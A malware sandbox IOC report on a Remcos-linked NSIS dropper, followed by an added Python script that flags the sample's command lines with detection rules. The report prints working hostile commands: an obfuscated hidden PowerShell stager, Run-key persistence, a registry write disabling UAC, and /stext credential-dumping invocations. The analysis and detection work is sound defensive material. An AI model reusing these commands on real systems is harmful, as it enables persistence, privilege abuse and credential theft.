IOC Report
IT01879020517_uGIim_xml#U00b7pdf.exe


Files

File Path | Type | Category | Malicious
IT01879020517_uGIim_xml#U00b7pdf.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | initial sample | malicious
C:\ProgramData\remcos\logs.dat | data | modified | malicious
C:\Users\user\AppData\Local\Temp\Loupen.exe | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | dropped | malicious
C:\Users\user\AppData\Local\Temp\Loupen.exe:Zone.Identifier | ASCII text, with CRLF line terminators | dropped | malicious
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\BgImage.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped | malicious
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\UserInfo.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped | malicious
C:\Users\user\AppData\Local\Temp\nsa7ECD.tmp\nsDialogs.dll | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | dropped | malicious
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und | ASCII text, with very long lines (65536), with no line terminators | dropped | malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log | data | dropped |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | Extensible storage engine DataBase, version 0x620, checksum 0xb598f686, page size 16384, DirtyShutdown, Windows version 10.0 | dropped |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | data | dropped |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_763cc06ddd191e0b2a3c26e6eec71deecc9f88_f469684b_67036ab9-a9a5-4c9a-8111-79a84e4dcabe\Report.wer | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_eeb76350ac29bb3b486937f9169f68096e924e2_f469684b_5f7c8348-3926-4c3f-a256-55d37fae53f0\Report.wer | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E5A.tmp.dmp | Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:38 2024, 0x1205a4 type | dropped |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8129.tmp.WERInternalMetadata.xml | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8169.tmp.xml | XML 1.0 document, ASCII text, with CRLF line terminators | dropped |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6BD.tmp.dmp | Mini DuMP crash report, 15 streams, Fri Jul 12 07:47:56 2024, 0x1205a4 type | dropped |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8C2.tmp.WERInternalMetadata.xml | XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8E2.tmp.xml | XML 1.0 document, ASCII text, with CRLF line terminators | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json | JSON data | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2ol2ewj.pcu.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xy2loq3c.gjs.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\bhv7B7B.tmp | Extensible storage engine DataBase, version 0x620, checksum 0xa18356d8, page size 32768, DirtyShutdown, Windows version 10.0 | dropped |
C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta | Unicode text, UTF-16, little-endian text, with no line terminators | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Farvebaandsomskifteren.txt | ASCII text, with CRLF line terminators | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Montanes176.opt | Matlab v4 mat-file (little endian) \303, text, rows 1202847744, columns 285212672 | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\Wafery.unt | data | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\barsel.pul | data | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\migraines.sla | PGP symmetric key encrypted data - Plaintext or unencrypted data | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tegnmssig.bra | data | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Mrkblondt\tradionsbevarende.unp | data | dropped |
C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Neuraxial.Aca | data | dropped |
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | JSON data | dropped |
C:\Windows\appcompat\Programs\Amcache.hve | MS Windows registry file, NT/2000 or above | dropped |
There are 25 further files that are hidden in this report and not listed above.

Processes

Path | Cmdline | Malicious
C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe | "C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "powershell.exe" -windowstyle hidden "$Enmeshed=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und';$Bia=$Enmeshed.SubString(70893,3);.$Bia($Enmeshed)" | malicious
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)" | malicious
C:\Windows\SysWOW64\reg.exe | REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)" | malicious
C:\Windows\SysWOW64\cmd.exe | /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f | malicious
C:\Windows\SysWOW64\reg.exe | C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\usqirflqwomfxiavdrsyibgadyvbmltib" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx" | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
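The command lines above carry the whole chain in a form that is easy to miss with keyword matching: the PowerShell stager reads Rockmusikkens.Und and invokes a three-character cmdlet name sliced from offset 70893 of that file, so the invoking cmdlet never appears on the command line; the Run-key value "Soumansite" is typed REG_EXPAND_SZ and its data starts with %Nostocaceae%, an environment variable whose definition is not in this report, followed by a Get-ItemProperty read of HKCU:\Exhusband\ whose contents are likewise not shown; EnableLUA is written to 0 under HKLM; and powershell.exe is launched with /stext, a switch powershell.exe does not accept (it is the NirSoft save-as-text switch). The Python below is an added example, not part of the sandbox report: it runs four detection rules over the report's command lines, embedded here as constructed process-creation records (the pid numbers and the record shape are assumptions), and pulls the persistence artefacts worth hunting for out of the REG ADD line.

```python
import re

# Constructed sample: the command lines from the Processes table, wrapped in a
# minimal process-creation record. The pid values are assumed, not from the report.
EVENTS = [
    {"pid": 1, "cmdline": r'"C:\Users\user\Desktop\IT01879020517_uGIim_xml#U00b7pdf.exe"'},
    {"pid": 2, "cmdline": r'''"powershell.exe" -windowstyle hidden "$Enmeshed=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Iatrochemically\Rockmusikkens.Und';$Bia=$Enmeshed.SubString(70893,3);.$Bia($Enmeshed)"'''},
    {"pid": 3, "cmdline": r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)"'''},
    {"pid": 4, "cmdline": r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soumansite" /t REG_EXPAND_SZ /d "%Nostocaceae% -windowstyle minimized $Prehaustorium=(Get-ItemProperty -Path 'HKCU:\Exhusband\').Dairywomen;%Nostocaceae% ($Prehaustorium)"'''},
    {"pid": 5, "cmdline": r"/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"pid": 6, "cmdline": r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"pid": 7, "cmdline": r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\rykxqmaxigubnclruofffpmjcklsta"'},
    {"pid": 8, "cmdline": r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\evdarx"'},
    {"pid": 9, "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

RULES = {
    # Reads a text file, slices a three-character cmdlet name from a fixed offset and
    # invokes it (via . or &) with the file contents as argument: the cmdlet name,
    # consistent with IEX, is never on the command line, only its offset is.
    "ps_offset_invoke": re.compile(
        r"Get-Content\b.*\.SubString\(\s*\d+\s*,\s*3\s*\).*[.&]\s*\$\w+\s*\(", re.I),
    # Run-key persistence typed REG_EXPAND_SZ whose data begins with an environment
    # variable, so the interpreter path is only resolved when the value is expanded.
    "runkey_expand_sz": re.compile(
        r'reg(?:\.exe)?\s+add\s+"?HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b'
        r'.*?/t\s+REG_EXPAND_SZ\b.*?/d\s+"%\w+%', re.I),
    # UAC disabled by writing EnableLUA=0 (takes effect after the next reboot).
    "uac_disable": re.compile(
        r'reg(?:\.exe)?\s+add\s+"?HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\b'
        r'.*?/v\s+EnableLUA\b.*?/d\s+0\b', re.I),
    # powershell.exe has no /stext switch; it is the NirSoft "save as text" switch, so a
    # powershell.exe image honouring it is running code that is not PowerShell.
    "stext_in_powershell": re.compile(r'(?:^|\\)powershell\.exe"?\s+/stext\s', re.I),
}

RUNKEY_RX = re.compile(r'/v\s+"?(?P<name>[^"\s]+)"?\s.*?/d\s+"(?P<data>.*)"\s*$', re.I)
ENV_RX = re.compile(r"%(\w+)%")
REGREAD_RX = re.compile(r"Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+)", re.I)
STEXT_RX = re.compile(r'/stext\s+"([^"]+)"', re.I)


def scan(events):
    """Return (pid, rule_name) pairs for every record whose command line trips a rule."""
    return [(ev["pid"], name)
            for ev in events
            for name, rx in RULES.items()
            if rx.search(ev["cmdline"])]


def extract_run_key(cmdline):
    """For a REG ADD ...\\Run line, return the value name, the environment variables
    and the registry reads its data depends on (all hunt targets), else None."""
    m = RUNKEY_RX.search(cmdline)
    if not m or not RULES["runkey_expand_sz"].search(cmdline):
        return None
    data = m.group("data")
    return {
        "value": m.group("name"),
        "env_vars": sorted(set(ENV_RX.findall(data))),
        "registry_reads": REGREAD_RX.findall(data),  # (path, property) pairs
        "data": data,
    }


def stext_output_path(cmdline):
    """Return the file a /stext invocation writes to, so it can be collected, else None."""
    m = STEXT_RX.search(cmdline)
    return m.group(1) if m else None


if __name__ == "__main__":
    for pid, rule in scan(EVENTS):
        print(f"pid {pid}: {rule}")
    for ev in EVENTS:
        info = extract_run_key(ev["cmdline"])
        if info:
            print(f"pid {ev['pid']}: Run value {info['value']!r}, env {info['env_vars']}, "
                  f"reads {info['registry_reads']}")
        out = stext_output_path(ev["cmdline"])
        if out:
            print(f"pid {ev['pid']}: /stext output {out}")
```

The two REG ADD lines fire twice each (once for the cmd.exe wrapper, once for reg.exe), which is expected for this chain; deduplicate on the parent/child relationship if the log source supplies it. The Run-key extractor deliberately reports %Nostocaceae% and HKCU:\Exhusband\ as unresolved dependencies rather than guessing their contents, since neither is in the report; on a live host they are the next two things to read, together with C:\ProgramData\remcos\logs.dat from the Files table.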